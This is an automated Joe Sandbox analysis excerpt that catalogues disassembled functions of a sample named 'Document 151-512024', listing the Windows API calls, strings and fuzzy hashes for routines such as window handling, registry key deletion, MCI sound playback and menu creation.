Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6A1
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6B3
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6C5
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6D7
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6E9
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D6FB
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D70D
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D71F
Part of subcall function 0097D63C: _free.LIBCMT ref: 0097D731

_free.LIBCMT ref: 0097DA96

Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0

_free.LIBCMT ref: 0097DAB8
_free.LIBCMT ref: 0097DACD
_free.LIBCMT ref: 0097DAD8
_free.LIBCMT ref: 0097DAFA
_free.LIBCMT ref: 0097DB0D
_free.LIBCMT ref: 0097DB1B
_free.LIBCMT ref: 0097DB26
_free.LIBCMT ref: 0097DB5E
_free.LIBCMT ref: 0097DB65
_free.LIBCMT ref: 0097DB82
_free.LIBCMT ref: 0097DB9A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4b0b8ee121895b216faa01daf601abde7a3b6de5133172243b1efd74da1876da
Instruction ID: 8db7df18c8f5d3368182eb3432e9173b6f4c768def0cc926d560ce70db1a13e7
Opcode Fuzzy Hash: 4b0b8ee121895b216faa01daf601abde7a3b6de5133172243b1efd74da1876da
Instruction Fuzzy Hash: 333147336052059FEB25AB38E945B5AB7E8FF40320F198829E54CD7191DB30AC808B24

Function 009A365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009A369C
_wcslen.LIBCMT ref: 009A36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009A3797
GetClassNameW.USER32(?,?,00000400), ref: 009A380C
GetDlgCtrlID.USER32(?), ref: 009A385D
GetWindowRect.USER32(?,?), ref: 009A3882
GetParent.USER32(?), ref: 009A38A0
ScreenToClient.USER32(00000000), ref: 009A38A7
GetClassNameW.USER32(?,?,00000100), ref: 009A3921
GetWindowTextW.USER32(?,?,00000400), ref: 009A395D

Strings

%s%u, xrefs: 009A3734

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 572d943b6ca733762688f456b5f5a5777c20b6dded40bf89aea73707e0e0cc37
Instruction ID: 53b0046bccaf663f9452199e12be0ce039962e3716bbdb473e724243efab8a14
Opcode Fuzzy Hash: 572d943b6ca733762688f456b5f5a5777c20b6dded40bf89aea73707e0e0cc37
Instruction Fuzzy Hash: F991BFB1204606EFDB19DF24C885FAAB7ACFF85354F008629F999D2190DB34EA45CBD1

Function 009A4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 009A4994
GetWindowTextW.USER32(?,?,00000400), ref: 009A49DA
_wcslen.LIBCMT ref: 009A49EB
CharUpperBuffW.USER32(?,00000000), ref: 009A49F7
_wcsstr.LIBVCRUNTIME ref: 009A4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 009A4A64
GetWindowTextW.USER32(?,?,00000400), ref: 009A4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 009A4AE6
GetClassNameW.USER32(?,?,00000400), ref: 009A4B20
GetWindowRect.USER32(?,?), ref: 009A4B8B

Strings

ThumbnailClass, xrefs: 009A4A6F, 009A4AF1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: f367479de144b97999e3c8acc06d97d436975ab89473cd6297643969675d6fdb
Instruction ID: 123500cb1de4822c3351ea4ace42817d24d87a5908e2b57b7296e098ff728a9d
Opcode Fuzzy Hash: f367479de144b97999e3c8acc06d97d436975ab89473cd6297643969675d6fdb
Instruction Fuzzy Hash: 8C919B710082069BDB04CF14C985BAAB7ECFFC6314F04846AFD8A9A196DB70ED45CBE1

Function 009D3A23 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009D3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009D3AA0
GetWindowLongW.USER32(?,000000F0), ref: 009D3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009D3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009D3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 009D3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 009D3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 009D3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 009D3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 009D3C13

Strings

0n, xrefs: 009D3A67, 009D3A76, 009D3AAC, 009D3B01, 009D3C2A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID: 0n
API String ID: 312131281-3368625520
Opcode ID: 7caa721e311f5ab458f21a45362eb920cbbcb1bec97c727258f3f5de3d7f7f06
Instruction ID: 6b503d58ed4b7de0888ff4b5e7d4b8b84e464f66cd3fd74ba3d33ee8c519cca1
Opcode Fuzzy Hash: 7caa721e311f5ab458f21a45362eb920cbbcb1bec97c727258f3f5de3d7f7f06
Instruction Fuzzy Hash: 3C617D75940208AFDB10DFA8CC81EEE77B8EF49700F10819AFA15A73A1D774AE41DB50

Function 009ADC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 009ADC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009ADC46
_wcslen.LIBCMT ref: 009ADC50
_wcsstr.LIBVCRUNTIME ref: 009ADCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 009ADCBC

Strings

04090000, xrefs: 009ADCF2
StringFileInfo\, xrefs: 009ADC8F
\VarFileInfo\Translation, xrefs: 009ADCB4
%u.%u.%u.%u, xrefs: 009ADD9A
DefaultLangCodepage, xrefs: 009ADD1F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: df98797eb1261c93258c6f6aa6f8f912a313576684eb36fd63962655ed857304
Instruction ID: 4553512fa657191338743804e151e93c0a3c4fdbfbb6f09d3e21d2636dac9305
Opcode Fuzzy Hash: df98797eb1261c93258c6f6aa6f8f912a313576684eb36fd63962655ed857304
Instruction Fuzzy Hash: EB412472A812057AEB00A7759C07FBF77ACEF82760F10446AF901E65C2EB74D904D7A5

Function 009CCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009CCC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 009CCC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009CCD48

Part of subcall function 009CCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 009CCCAA
Part of subcall function 009CCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 009CCCBD
Part of subcall function 009CCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009CCCCF
Part of subcall function 009CCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009CCD05
Part of subcall function 009CCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009CCD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 009CCCF3

Strings

RegDeleteKeyExW, xrefs: 009CCCC9
advapi32.dll, xrefs: 009CCCB8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 432b73d6b849163905a07534d37438fe70a1250d223558908aebae2886d37a86
Instruction ID: 6127d3a6bf1f26459187e7cbbfa0a4a72251188db859eae31a34077ffb787337
Opcode Fuzzy Hash: 432b73d6b849163905a07534d37438fe70a1250d223558908aebae2886d37a86
Instruction Fuzzy Hash: 053184B1D41129BBDB208B50DC88EFFBF7CEF55740F004569E90AE2140DB345A45EAB1

Function 009AE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 009AE6B4

Part of subcall function 0095E551: timeGetTime.WINMM(?,?,009AE6D4), ref: 0095E555

Sleep.KERNEL32(0000000A), ref: 009AE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 009AE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009AE727
SetActiveWindow.USER32 ref: 009AE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009AE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 009AE773
Sleep.KERNEL32(000000FA), ref: 009AE77E
IsWindow.USER32 ref: 009AE78A
EndDialog.USER32(00000000), ref: 009AE79B

Strings

BUTTON, xrefs: 009AE719

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 18fbbce659bde51bd025242711ae29ab3349ecc8a0025ffdd636802cf22532d9
Instruction ID: 03f1a1ae4683b8335b33f0f1e3000420bbb895f6bde4c6c97d5c94bc482d1aec
Opcode Fuzzy Hash: 18fbbce659bde51bd025242711ae29ab3349ecc8a0025ffdd636802cf22532d9
Instruction Fuzzy Hash: 4C2193B0354206AFEB009FA0EC89B653B6DF796349F108836F521821E1DB71EC51DBA4

Function 009AE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009AEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009AEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009AEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009AEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009AEAA7

Strings

open , xrefs: 009AEA0C
play PlayMe, xrefs: 009AEAA2
status PlayMe mode, xrefs: 009AEA58
alias PlayMe, xrefs: 009AEA36
play PlayMe wait, xrefs: 009AEA91
close PlayMe, xrefs: 009AEA6E, 009AEA9B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: cf0eb568d2eefda5edadcf15927a97db3fa027260d35f80e64cfabf87d36249a
Instruction ID: ce0edf5df82da339246c8d72eb7d76d3d1fb75436f462b6500669a32a5a8a6a5
Opcode Fuzzy Hash: cf0eb568d2eefda5edadcf15927a97db3fa027260d35f80e64cfabf87d36249a
Instruction Fuzzy Hash: B4115E31A9025D79E720A7A5EC4AEFF6ABCFBD2B44F444829B811A20D1EAB00955C5B0

Function 009A5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 009A5CE2
GetWindowRect.USER32(00000000,?), ref: 009A5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009A5D59
GetDlgItem.USER32(?,00000002), ref: 009A5D69
GetWindowRect.USER32(00000000,?), ref: 009A5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 009A5DCF
GetDlgItem.USER32(?,000003E9), ref: 009A5DDD
GetWindowRect.USER32(00000000,?), ref: 009A5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 009A5E31
GetDlgItem.USER32(?,000003EA), ref: 009A5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009A5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 009A5E67

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 3bb78978c59b2ebd860e35a067bf847d95b5921ea429fcad48e925bb265017d7
Instruction ID: 06bf150a5b0f92f3f03581f3ad44d5a8699fad87d092e8b589f750a8ea992e8a
Opcode Fuzzy Hash: 3bb78978c59b2ebd860e35a067bf847d95b5921ea429fcad48e925bb265017d7
Instruction Fuzzy Hash: 4A512EB1B50606AFDF18CF68CD89AAEBBB9FB49300F518129F515E7290D7709E40DB90

Function 009D50D4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 009D5186
ShowWindow.USER32(?,00000000), ref: 009D51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 009D51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 009D51D1

Part of subcall function 009D6FBA: DeleteObject.GDI32(00000000), ref: 009D6FE6

GetWindowLongW.USER32(?,000000F0), ref: 009D520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009D521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009D524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 009D5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 009D5296

Strings

0n, xrefs: 009D5104

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID: 0n
API String ID: 3210457359-3368625520
Opcode ID: 5f6ab7627f76ea3b8a39171810e9d5221dc986089ed0ebad8dd27b255cb31b05
Instruction ID: e6acbe276b03ad285a4b174feb69dd3a51210b9e4b350756daafc624c69ce3c2
Opcode Fuzzy Hash: 5f6ab7627f76ea3b8a39171810e9d5221dc986089ed0ebad8dd27b255cb31b05
Instruction Fuzzy Hash: EA51AE70AD5A09BEEF209F64CC46BD83B69EB05361F15C113FA24963E0C775E988DB40

Function 009A96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0098F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 009A9717
LoadStringW.USER32(00000000,?,0098F7F8,00000001), ref: 009A9720

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0098F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 009A9742
LoadStringW.USER32(00000000,?,0098F7F8,00000001), ref: 009A9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 009A9866

Strings

Line %d:, xrefs: 009A97A0
^ ERROR, xrefs: 009A97FB
%s (%d) : ==> %s: %s %s, xrefs: 009A984A
Line %d (File "%s"):, xrefs: 009A978F
Error: , xrefs: 009A981D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 1ee6a2f8a365e056f44d3adfad0de8774cb15a4e38c0b52fb8125cd8b5703293
Instruction ID: 9a72f5ce5fa86aa24770b1ff7c7d0d9d6c1b3513ebb9040e8b4a26d2bc404f53
Opcode Fuzzy Hash: 1ee6a2f8a365e056f44d3adfad0de8774cb15a4e38c0b52fb8125cd8b5703293
Instruction Fuzzy Hash: E1414D72840209AADF04EFE4DE96FEEB378AF95340F504425F60572092EB356F48CBA1

Function 009D3C46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 009D3C79
SetMenu.USER32(?,00000000), ref: 009D3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009D3D10
IsMenu.USER32(?), ref: 009D3D24
CreatePopupMenu.USER32 ref: 009D3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009D3D5B
DrawMenuBar.USER32 ref: 009D3D63

Strings

0, xrefs: 009D3C54
0n, xrefs: 009D3CCF, 009D3CEC
F, xrefs: 009D3D4E

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$0n$F
API String ID: 161812096-1675433258
Opcode ID: 8bc6a72e2f70c7589c9db6af11936c0132c84c96118aa3e8053cb88c08e5273e
Instruction ID: 7cfface7a94e5314788d3c1a962bd9636cb13ef74f2de0e7546315f1248b157b
Opcode Fuzzy Hash: 8bc6a72e2f70c7589c9db6af11936c0132c84c96118aa3e8053cb88c08e5273e
Instruction Fuzzy Hash: 5C41ADB8A4520AAFDF10CF60E844EDA77BAFF49341F14802AF946973A0D730AA00DF51

Function 009C3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009C3C5C
CoInitialize.OLE32(00000000), ref: 009C3C8A
CoUninitialize.OLE32 ref: 009C3C94
_wcslen.LIBCMT ref: 009C3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 009C3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 009C3ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 009C3F0E
CoGetObject.OLE32(?,00000000,009DFB98,?), ref: 009C3F2D
SetErrorMode.KERNEL32(00000000), ref: 009C3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009C3FC4
VariantClear.OLEAUT32(?), ref: 009C3FD8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 4a85a8ff8b0f688fb7b09e4b7b26ee6634cd85a7f72da31a3d421973b1947771
Instruction ID: 9278213b8f5cbc56119ca82b5c33a86f432d789dccde1d94b964bfd4d7ad3b65
Opcode Fuzzy Hash: 4a85a8ff8b0f688fb7b09e4b7b26ee6634cd85a7f72da31a3d421973b1947771
Instruction Fuzzy Hash: 03C10371A082059FD700DF68C884E2BBBE9FF89744F10891DF98A9B251D731EE45CB52

Function 009B7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009B7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009B7B8F
SHGetDesktopFolder.SHELL32(?), ref: 009B7BA3
CoCreateInstance.OLE32(009DFD08,00000000,00000001,00A06E6C,?), ref: 009B7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009B7C74
CoTaskMemFree.OLE32(?,?), ref: 009B7CCC
SHBrowseForFolderW.SHELL32(?), ref: 009B7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009B7D7A
CoTaskMemFree.OLE32(00000000), ref: 009B7D81
CoTaskMemFree.OLE32(00000000), ref: 009B7DD6
CoUninitialize.OLE32 ref: 009B7DDC

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

